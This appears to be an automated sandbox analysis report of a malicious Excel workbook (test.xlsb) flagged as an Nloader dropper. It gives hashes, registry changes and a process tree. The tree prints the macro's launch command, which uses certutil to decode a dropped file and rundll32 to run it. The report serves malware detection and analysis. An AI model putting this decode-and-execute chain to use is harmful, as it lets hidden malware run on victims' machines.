Analysis
-
max time kernel
120s -
max time network
11s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
15-05-2021 06:30
General
-
Target
test.xlsb
-
Size
254KB
-
MD5
dc37192b5c4c8c4f94c73c18ce5e3829
-
SHA1
0aa6bb11a11dade2269d90b2781ed0a517362012
-
SHA256
db53f42e13d2685bd34dbc5c79fad637c9344e72e210ca05504420874e98c2a6
-
SHA512
3e8b179d8521fb33a46eeeca74bbda7a4e8a32f47b6195b17d62664dd2e31716261a61a495857ed08dbbc001a9eab8adec7133921179eb3df66c53e18c586d9a
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1692 788 cmd.exe EXCEL.EXE -
Nloader Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/960-71-0x0000000000260000-0x0000000000269000-memory.dmp nloader behavioral1/memory/960-74-0x0000000000270000-0x0000000000277000-memory.dmp nloader behavioral1/memory/960-77-0x00000000002D0000-0x00000000002D5000-memory.dmp nloader behavioral1/memory/960-79-0x0000000000250000-0x0000000000256000-memory.dmp nloader -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 960 rundll32.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1188 960 WerFault.exe rundll32.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 788 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
WerFault.exepid process 1188 WerFault.exe 1188 WerFault.exe 1188 WerFault.exe 1188 WerFault.exe 1188 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WerFault.exepid process 1188 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
WerFault.exedescription pid process Token: SeDebugPrivilege 1188 WerFault.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 788 EXCEL.EXE 788 EXCEL.EXE 788 EXCEL.EXE 788 EXCEL.EXE 788 EXCEL.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
EXCEL.EXEcmd.exerundll32.exedescription pid process target process PID 788 wrote to memory of 1692 788 EXCEL.EXE cmd.exe PID 788 wrote to memory of 1692 788 EXCEL.EXE cmd.exe PID 788 wrote to memory of 1692 788 EXCEL.EXE cmd.exe PID 788 wrote to memory of 1692 788 EXCEL.EXE cmd.exe PID 1692 wrote to memory of 564 1692 cmd.exe certutil.exe PID 1692 wrote to memory of 564 1692 cmd.exe certutil.exe PID 1692 wrote to memory of 564 1692 cmd.exe certutil.exe PID 1692 wrote to memory of 564 1692 cmd.exe certutil.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 1692 wrote to memory of 960 1692 cmd.exe rundll32.exe PID 960 wrote to memory of 1188 960 rundll32.exe WerFault.exe PID 960 wrote to memory of 1188 960 rundll32.exe WerFault.exe PID 960 wrote to memory of 1188 960 rundll32.exe WerFault.exe PID 960 wrote to memory of 1188 960 rundll32.exe WerFault.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\test.xlsb1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\cmd.execmd.exe /c certutil -decode %PUBLIC%\130486.dot %PUBLIC%\130486.pgj && rundll32 %PUBLIC%\130486.pgj,DF12⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\certutil.execertutil -decode C:\Users\Public\130486.dot C:\Users\Public\130486.pgj3⤵PID:564
-
C:\Windows\SysWOW64\rundll32.exerundll32 C:\Users\Public\130486.pgj,DF13⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 4684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1188
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
5ad4845793b5dc3308172b39f3c3dbc7
SHA14285a93ec1a49f28cb2542af2a2bafc08e4f8a18
SHA2562632c0cc222a6d436b50a418605a7bd4fa8f363ab8d93d10b831cdb28a2ac1bc
SHA5124a1c88eb99d9d9713802f5f2c9b96d15bb4cab8af7360c62d3e1b614fe07ea33771b33075c15a0f400daad7a713edc684e2c0566cd9ab5805b00f05e3b58a5df
-
MD5
14089c2d5a4207dd80f71fb258200848
SHA180fa3d47f321108d7c956680ac1b1f5c611d6277
SHA256f3b5cf1e40aed4567a8996cf107285907d432b4bc8cc3d0b46aae628813d82d4
SHA512cbfcbcddb80749711853aa7d39525e299015d31451615cfce64e54f197d6a1e87deb60920723c7a90b30c0da05e469c4208a758e93ad2e49f9e78eefb231bfa6
-
MD5
14089c2d5a4207dd80f71fb258200848
SHA180fa3d47f321108d7c956680ac1b1f5c611d6277
SHA256f3b5cf1e40aed4567a8996cf107285907d432b4bc8cc3d0b46aae628813d82d4
SHA512cbfcbcddb80749711853aa7d39525e299015d31451615cfce64e54f197d6a1e87deb60920723c7a90b30c0da05e469c4208a758e93ad2e49f9e78eefb231bfa6